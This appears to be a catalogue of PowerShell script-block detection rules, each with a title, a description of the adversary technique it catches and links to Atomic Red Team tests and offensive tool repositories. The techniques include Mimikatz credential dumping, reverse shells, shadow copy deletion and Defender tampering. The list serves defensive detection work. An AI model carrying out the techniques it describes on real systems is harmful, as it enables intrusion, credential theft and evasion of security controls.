Powershell LocalAccount Manipulation Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1
Suspicious PowerShell Mailbox Export to Share - PS Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitations https://youtu.be/5mqid-7zp8k?t=2481, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
Malicious PowerShell Commandlets - ScriptBlock Detects Commandlet names from well-known PowerShell exploitation frameworks https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon
Live Memory Dump Using Powershell Detects usage of a PowerShell command to dump the live memory of a Windows machine https://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps
Malicious PowerShell Keywords Detects keywords from well-known PowerShell exploitation frameworks https://adsecurity.org/?p=2921
Modify Group Policy Settings - ScriptBlockLogging Detects malicious GPO modifications, which can be used to implement many other malicious behaviors. https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md
Powershell MsXml COM Object Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt, https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85), https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html
Malicious Nishang PowerShell Commandlets Detects Commandlet names and arguments from the Nishang exploitation framework https://github.com/samratashok/nishang
NTFS Alternate Data Stream Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging. https://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md
Code Executed Via Office Add-in XLL File Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md
Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock Detects the execution of powershell scripts with calls to the "Start-NetEventSession" cmdlet. Which allows an attacker to start event and packet capture for a network event session. Adversaries may attempt to capture network to gather information over the course of an operation. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing, https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/7b8935fe4c82cb64d61343de1a8b2e38dd968534/handbooks/10_post_exploitation.md, https://github.com/forgottentq/powershell/blob/9e616363d497143dc955c4fdce68e5c18d28a6cb/captureWindows-Endpoint.ps1#L13
Potential Invoke-Mimikatz PowerShell Script Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords. https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script
PowerShell Web Access Installation - PsScript Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication, https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a, https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41
PowerView PowerShell Cmdlets - ScriptBlock Detects Cmdlet names from PowerView of the PowerSploit exploitation framework. https://powersploit.readthedocs.io/en/stable/Recon/README, https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon, https://thedfirreport.com/2020/10/08/ryuks-return, https://adsecurity.org/?p=2277
PowerShell Credential Prompt Detects PowerShell calling a credential prompt https://twitter.com/JohnLaTwC/status/850381440629981184, https://t.co/ezOTGy1a1G
PSAsyncShell - Asynchronous TCP Reverse Shell Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell https://github.com/JoelGMSec/PSAsyncShell
PowerShell PSAttack Detects the use of PSAttack PowerShell hack tool https://adsecurity.org/?p=2921
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
PowerShell Remote Session Creation Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4
PowerShell Script With File Hostname Resolving Capabilities Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries. https://www.fortypoundhead.com/showcontent.asp?artid=24022, https://labs.withsecure.com/publications/fin7-target-veeam-servers
Request A Single Ticket via PowerShell Detects usage of native PowerShell Identity modules to query the domain and extract the Service Principal Names for a single computer. This behavior is typically used during a Kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell
Root Certificate Installed - PowerShell Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
Suspicious Invoke-Item From Mount-DiskImage Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso, https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps
PowerShell Script With File Upload Capabilities Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md, https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4
PowerShell Script Change Permission Via Set-Acl - PsScript Detects PowerShell scripts that set the ACL of a file or a folder via Set-Acl https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md
Powershell Sensitive File Discovery Detects adversaries enumerating sensitive files https://twitter.com/malmoeb/status/1570814999370801158
PowerShell Set-Acl On Windows Folder - PsScript Detects PowerShell scripts to set the ACL to a file in the Windows folder https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1
Change PowerShell Policies to an Insecure Level - PowerShell Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4, https://adsecurity.org/?p=2604
PowerShell ShellCode Detects Base64 encoded Shellcode https://twitter.com/cyb3rops/status/1063072865992523776
Malicious ShellIntel PowerShell Commandlets Detects Commandlet names from ShellIntel exploitation scripts. https://github.com/Shellntel/scripts/
Detected Windows Software Discovery - PowerShell Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md, https://github.com/harleyQu1nn/AggressorScripts
Powershell Store File In Alternate Data Stream Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md
Potential Persistence Via Security Descriptors - ScriptBlock Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project. https://github.com/HarmJ0y/DAMP
AD Groups Or Users Enumeration Using PowerShell - ScriptBlock Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md
Potential PowerShell Obfuscation Using Character Join Detects specific techniques often seen used inside of PowerShell scripts to obfuscate alias creation Internal Research
Suspicious Eventlog Clear Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs https://twitter.com/oroneequalsone/status/1568432028361830402, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md, https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html
Powershell Directory Enumeration Detects technique used by MAZE ransomware to enumerate directories using Powershell https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md, https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
Suspicious PowerShell Download - Powershell Script Detects suspicious PowerShell download command https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0, https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0
Powershell Execute Batch Script Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script
Troubleshooting Pack Cmdlet Execution Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS) https://twitter.com/nas_bench/status/1537919885031772161, https://lolbas-project.github.io/lolbas/Binaries/Msdt/
Extracting Information with PowerShell Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
PowerShell Get-Process LSASS in ScriptBlock Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
Suspicious GetTypeFromCLSID ShellExecute Detects suspicious PowerShell code that executes COM objects. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object
Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy Detects PowerShell activity in which Get-AdDefaultDomainPasswordPolicy is used to get the default password policy for an Active Directory domain. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy, https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
Suspicious PowerShell Get Current User Detects the use of PowerShell to identify the current logged user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script
Suspicious GPO Discovery With Get-GPO Detect use of Get-GPO to get one GPO or all the GPOs in a domain. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md, https://learn.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps
Suspicious Process Discovery With Get-Process Get the processes that are running on the local computer. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.4
Suspicious Hyper-V Cmdlets Adversaries may carry out malicious operations using a virtual instance to avoid detection https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine
Suspicious PowerShell Invocations - Generic Detects suspicious PowerShell invocation command parameters Internal Research
Suspicious PowerShell Invocations - Specific Detects suspicious PowerShell invocation command parameters Internal Research
Suspicious IO.FileStream Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md
Change User Agents with WebRequest Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols
Potential Keylogger Activity Detects PowerShell scripts that contain references to keystroke capturing functions. https://twitter.com/ScumBots/status/1610626724257046529, https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content, https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content, https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0
Suspicious Get Local Groups Information - PowerShell Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
Potential Suspicious PowerShell Keywords Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462, https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1, https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1, https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7
Powershell Local Email Collection Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user's local system, such as Outlook storage or cache files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md
PowerShell Deleted Mounted Share Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md
Suspicious Mount-DiskImage Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image, https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps
Suspicious Connection to Remote Account Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos
Suspicious New-PSDrive to Admin Share Adversaries may interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2
Suspicious TCP Tunnel Via PowerShell Script Detects PowerShell scripts that create sockets/listeners, which could be indicative of tunneling activity. https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1
Recon Information for Export with PowerShell Once established within a system or network, an adversary may use automated techniques for collecting internal data https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md
Remove Account From Domain Admin Group Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group
Suspicious Service DACL Modification Via Set-Service Cmdlet - PS Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
Suspicious Get Information for SMB Share Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md
Potential PowerShell Obfuscation Using Alias Cmdlets Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts. https://github.com/1337Rin/Swag-PSO
Suspicious SSL Connection Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2, https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
Suspicious Start-Process PassThru Detects PowerShell use of the Start-Process PassThru option to start a process in the background. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7
Suspicious Unblock-File Detects removal of the Zone.Identifier alternate data stream, which identifies a file as downloaded from the internet. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2
Powershell Suspicious Win32_PnPEntity Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md
Replace Desktop Wallpaper by Powershell An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md
Delete Volume Shadow Copies via WMI with PowerShell - PS Script Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell
Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html
Suspicious PowerShell WindowStyle Option Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md
PowerShell Write-EventLog Usage Detects usage of the "Write-EventLog" cmdlet with the 'RawData' flag. The cmdlet can be leveraged to write malicious payloads to the EventLog and retrieve them later for use. https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/
Zip A Folder With PowerShell For Staging In Temp - PowerShell Script Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
SyncAppvPublishingServer Execution to Bypass Powershell Restriction Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions. https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088
Tamper Windows Defender - ScriptBlockLogging Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps, https://bidouillesecurity.com/disable-windows-defender-in-powershell/
Testing Usage of Uncommonly Used Port Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 (Citation: Symantec Elfin Mar 2019) or port 587 (Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell, https://learn.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps
Powershell Timestomp Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md, https://www.offensive-security.com/metasploit-unleashed/timestomp/
Powershell Token Obfuscation - Powershell Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation
User Discovery And Export Via Get-ADUser Cmdlet - PowerShell Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
Potential Persistence Via PowerShell User Profile Using Add-Content Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md
Abuse of Service Permissions to Hide Services Via Set-Service - PS Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
Veeam Backup Servers Credential Dumping Script Execution Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials. https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/, https://labs.withsecure.com/publications/fin7-target-veeam-servers
Usage Of Web Request Commands And Cmdlets - ScriptBlock Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/, https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)
PowerShell WMI Win32_Product Install MSI Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
Windows Firewall Profile Disabled Detects when a user disables the Windows Firewall via a Profile to help evade defense. https://learn.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2022-ps, https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell, https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php, http://woshub.com/manage-windows-firewall-powershell/, https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html
